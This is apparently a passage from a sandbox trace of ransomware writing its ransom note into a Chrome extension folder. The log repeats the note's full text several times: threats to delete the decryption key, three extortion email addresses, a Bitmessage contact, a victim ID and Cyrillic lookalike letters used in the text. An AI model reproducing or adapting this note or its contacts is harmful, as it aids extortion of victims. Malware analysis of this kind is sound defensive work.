th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.274] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.274] CloseHandle (hObject=0x2c8) returned 1 [0280.274] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0280.274] GetLastError () returned 0x2 [0280.274] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.275] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.275] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.275] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 